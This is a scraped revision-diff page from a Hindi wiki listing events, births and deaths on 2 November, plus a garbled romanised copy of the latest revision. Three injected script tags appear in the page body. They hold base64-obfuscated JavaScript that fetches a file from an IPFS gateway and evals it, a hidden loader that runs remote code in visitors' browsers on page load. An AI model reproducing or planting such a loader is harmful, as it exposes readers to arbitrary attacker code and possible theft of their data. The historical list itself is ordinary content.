Difference between revisions of "2 नवंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(12 intermediate revisions by 5 users not shown)
Line 4: Line 4:
  
 
==2 नवंबर की महत्त्वपूर्ण घटनाएँ==
 
==2 नवंबर की महत्त्वपूर्ण घटनाएँ==
 +
* 1774 - अंग्रेज अधिकारी कमांडर इन चीफ ऑफ ब्रिटिश इंड़िया राबर्ट क्लाइव ने इंग्लैंड में आत्महत्या की।
 +
* 1834 - एटलस नाम का जहाज भारतीय मजदूरों को लेकर मॉरिशस पहुंचा था जिसे वहां अप्रवासी दिवस के रूप में मनाया जाता है।
 +
* 1835 - [[अमेरिका]] के मूल निवासियों के विभिन्न गुटों के बीच फ्लोरिडा के ओसिओला में दूसरा सेमीनोले युद्ध शुरू हुआ। यह लड़ाई फ्लोरिडा युद्ध के नाम से भी मशहूर है।
 +
* 1841 - अकबर खान ने [[अफ़ग़ानिस्तान]] में शाह शुजा के खिलाफ विद्रोह किया,जिसमें उसे सफलता मिली।
 +
* 1852 - फ्रेंकलिन पियर्स अमेरिका के राष्ट्रपति बने।
 
* [[1914]] - [[रूस]] द्वारा तुर्की के विरुद्ध युद्ध घोषित।
 
* [[1914]] - [[रूस]] द्वारा तुर्की के विरुद्ध युद्ध घोषित।
 
* [[1950]] - जार्ज बर्नार्ड शा का 97 वर्ष की आयु में देहावसान।  
 
* [[1950]] - जार्ज बर्नार्ड शा का 97 वर्ष की आयु में देहावसान।  
 +
* [[1951]] - मिस्र में ब्रिटेन के खिलाफ हुए प्रदर्शनों पर काबू पाने के लिए करीब छह हजार ब्रिटिश सैनिक पहुंचे।
 +
* [[1984]] - अमेरिका में 1962 के बाद पहली बार एक महिला वेल्मा बारफिल्ड को फाँसी की सजा दी गयी।
 +
* [[1986]] - बेरूत में कट्टरपंथियों के जरिए बंधक बनाए गए एक अमेरिकी नागरिक डेविड जैकोब्सन को रिहा कराया गया।
 
* [[1999]] - पाकिस्तान की राजधानी इस्लामाबाद में संयुक्त राष्ट्र संघ और अमेरिकी केन्द्रों पर अज्ञात लोगों के द्वारा राकेट से हमला।
 
* [[1999]] - पाकिस्तान की राजधानी इस्लामाबाद में संयुक्त राष्ट्र संघ और अमेरिकी केन्द्रों पर अज्ञात लोगों के द्वारा राकेट से हमला।
 
* [[2000]] - पश्चिम एशिया में हिंसा रोकने के फ़ार्मूले पर सहमति।  
 
* [[2000]] - पश्चिम एशिया में हिंसा रोकने के फ़ार्मूले पर सहमति।  
 
* [[2001]] - अफ़ग़ानिस्तान में विशेष बलों की संख्या बढ़ाने का अमेरिका का फैसला।  
 
* [[2001]] - अफ़ग़ानिस्तान में विशेष बलों की संख्या बढ़ाने का अमेरिका का फैसला।  
 +
** [[श्रीपाद येसो नाईक]] ने केन्द्रीय कैबिनेट मंत्री में पोत परिवहन पद ग्रहण किया था।
 +
* [[2002]] - मुफ़्ती मोहम्मद सईद ने जम्मू और कश्मीर के मुख्यमंत्री पद को ग्रहण किया था।
 
* [[2004]] - चीन के हेनान में जातीय संघर्ष में 20 मरे।  
 
* [[2004]] - चीन के हेनान में जातीय संघर्ष में 20 मरे।  
 +
* [[2005]] - ग़ुलाम नबी आज़ाद ने जम्मू और कश्मीर के मुख्यमंत्री पद को ग्रहण किया था।
 
* [[2007]] - [[अंतर्राष्ट्रीय अंतरिक्ष स्टेशन]] पर ख़राब सोलर पंखों को ठीक करने के बाद डिस्कवरी के यात्री धरती पर सुरक्षित लौटे।  
 
* [[2007]] - [[अंतर्राष्ट्रीय अंतरिक्ष स्टेशन]] पर ख़राब सोलर पंखों को ठीक करने के बाद डिस्कवरी के यात्री धरती पर सुरक्षित लौटे।  
* [[2008]] - केन्द्र सरकार ने सेवानिवृत्त के बाद पेंशन फंड से धन निकालने की सुविधा समाप्त की।  
+
* [[2008]] - केन्द्र सरकार ने सेवानिवृत्त के बाद पेंशन फंड से धन निकालने की सुविधा समाप्त की।
 +
 
 
==2 नवंबर को जन्मे व्यक्ति==
 
==2 नवंबर को जन्मे व्यक्ति==
 +
* 1534 - गुरु रामदास - सिखों के चौथे।
 +
* [[1833]] - [[महेन्द्रलाल सरकार]] - समाज सुधारक और होम्‍योपैथ को बढ़ावा देने वाले चिकित्सक थे।
 
* [[1982]] - [[योगेश्वर दत्त]] - [[भारत]] के प्रसिद्ध पहलवान तथा [[कुश्ती]] के खिलाड़ी।
 
* [[1982]] - [[योगेश्वर दत्त]] - [[भारत]] के प्रसिद्ध पहलवान तथा [[कुश्ती]] के खिलाड़ी।
 +
* [[1883]] - [[बसंत कुमार दास]] - [[असम]] के स्वतंत्रता सेनानी तथा राजनेता।
 
* [[1897]] - [[सोहराब मोदी]] - प्रसिद्ध भारतीय अभिनेता तथा फ़िल्म निर्माता-निर्देशक।
 
* [[1897]] - [[सोहराब मोदी]] - प्रसिद्ध भारतीय अभिनेता तथा फ़िल्म निर्माता-निर्देशक।
 +
* [[1929]] - [[राम मोहन]] - प्रसिद्ध भारतीय चरित्र अभिनेता।
 
* [[1941]] - [[अरुण शौरी]] - [[भारत]] के अदम्य निर्भीकता वाले पत्रकार, बुद्धिजीवी, प्रसिद्ध लेखक और राजनेता।
 
* [[1941]] - [[अरुण शौरी]] - [[भारत]] के अदम्य निर्भीकता वाले पत्रकार, बुद्धिजीवी, प्रसिद्ध लेखक और राजनेता।
* [[1960]] - [[अनु मलिक]], हिन्दी फ़िल्म संगीतकार।
+
* [[1960]] - [[अनु मलिक]] - [[हिन्दी]] फ़िल्म संगीतकार और गायक हैं।
* [[1965]] - [[शाहरुख खान]], हिन्दी फ़िल्म अभिनेता।
+
* [[1965]] - [[शाहरुख़ ख़ान]], हिन्दी फ़िल्म अभिनेता।
 +
* [[1969]] - [[संजीव बजाज]] - बजाज फिनसर्व के अध्यक्ष और प्रबंध निदेशक हैं।
 
* [[1940]] - [[ममता कालिया]], साहित्यकार।
 
* [[1940]] - [[ममता कालिया]], साहित्यकार।
 +
* [[1877]] - [[आगा ख़ाँ तृतीय]] - शियाओं के निजारी इस्माईली मत के आध्यात्मिक नेता थे।
 +
 
==2 नवंबर को हुए निधन==
 
==2 नवंबर को हुए निधन==
 
* [[1885]] - [[अण्णा साहेब किर्लोस्कर]] - [[मराठी भाषा|मराठी]] [[रंगमंच]] में क्रांति लाने वाले प्रसिद्ध नाटककार।
 
* [[1885]] - [[अण्णा साहेब किर्लोस्कर]] - [[मराठी भाषा|मराठी]] [[रंगमंच]] में क्रांति लाने वाले प्रसिद्ध नाटककार।
 +
* [[1965]] - [[रसूना सैद]] - दूसरे विश्वयुद्ध के दौरान सक्रिय महिला जांबाजों में से एक थीं।
 +
* [[1990]] - [[भालचंद्र दिगंबर गरवारे]] - प्रसिद्ध भारतीय व्यवसायी थे। वे गरवारे समूह के संस्थापक थे।
 +
* [[2012]] - श्रीराम शंकर अभयंकर - भारतीय - अमेरिकी गणितज्ञ।
 +
 
==2 नवंबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==2 नवंबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
* अंतर्राष्ट्रीय रेड क्रास दिवस (सप्ताह)
 
* अंतर्राष्ट्रीय रेड क्रास दिवस (सप्ताह)
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
* [http://www.univarta.com/history-of-the-02november-2016/today-in-history/news/672237.html univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Latest revision as of 09:37, 21 February 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 2 navanbar varsh ka 306 vaan (lip varsh mean yah 307 vaan) din hai. sal mean abhi aur 59 din shesh haian.

2 navanbar ki mahattvapoorn ghatanaean

  • 1774 - aangrej adhikari kamaandar in chiph aauph british ian diya rabart klaiv ne ianglaiand mean atmahatya ki.
  • 1834 - etalas nam ka jahaj bharatiy majadooroan ko lekar m aaurishas pahuancha tha jise vahaan apravasi divas ke roop mean manaya jata hai.
  • 1835 - amerika ke mool nivasiyoan ke vibhinn gutoan ke bich phlorida ke osiola mean doosara seminole yuddh shuroo hua. yah l daee phlorida yuddh ke nam se bhi mashahoor hai.
  • 1841 - akabar khan ne afaganistan mean shah shuja ke khilaph vidroh kiya,jisamean use saphalata mili.
  • 1852 - phreankalin piyars amerika ke rashtrapati bane.
  • 1914 - roos dvara turki ke viruddh yuddh ghoshit.
  • 1950 - jarj barnard sha ka 97 varsh ki ayu mean dehavasan.
  • 1951 - misr mean briten ke khilaph hue pradarshanoan par kaboo pane ke lie karib chhah hajar british sainik pahuanche.
  • 1984 - amerika mean 1962 ke bad pahali bar ek mahila velma baraphild ko phaansi ki saja di gayi.
  • 1986 - beroot mean kattarapanthiyoan ke jarie bandhak banae ge ek ameriki nagarik devid jaikobsan ko riha karaya gaya.
  • 1999 - pakistan ki rajadhani islamabad mean sanyukt rashtr sangh aur ameriki kendroan par ajnat logoan ke dvara raket se hamala.
  • 2000 - pashchim eshiya mean hiansa rokane ke farmoole par sahamati.
  • 2001 - afaganistan mean vishesh baloan ki sankhya badhane ka amerika ka phaisala.
  • 2002 - mufti mohammad seed ne jammoo aur kashmir ke mukhyamantri pad ko grahan kiya tha.
  • 2004 - chin ke henan mean jatiy sangharsh mean 20 mare.
  • 2005 - gulam nabi azad ne jammoo aur kashmir ke mukhyamantri pad ko grahan kiya tha.
  • 2007 - aantarrashtriy aantariksh steshan par kharab solar pankhoan ko thik karane ke bad diskavari ke yatri dharati par surakshit laute.
  • 2008 - kendr sarakar ne sevanivritt ke bad peanshan phand se dhan nikalane ki suvidha samapt ki.

2 navanbar ko janme vyakti

2 navanbar ko hue nidhan

2 navanbar ke mahattvapoorn avasar evan utsav

  • aantarrashtriy red kras divas (saptah)

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>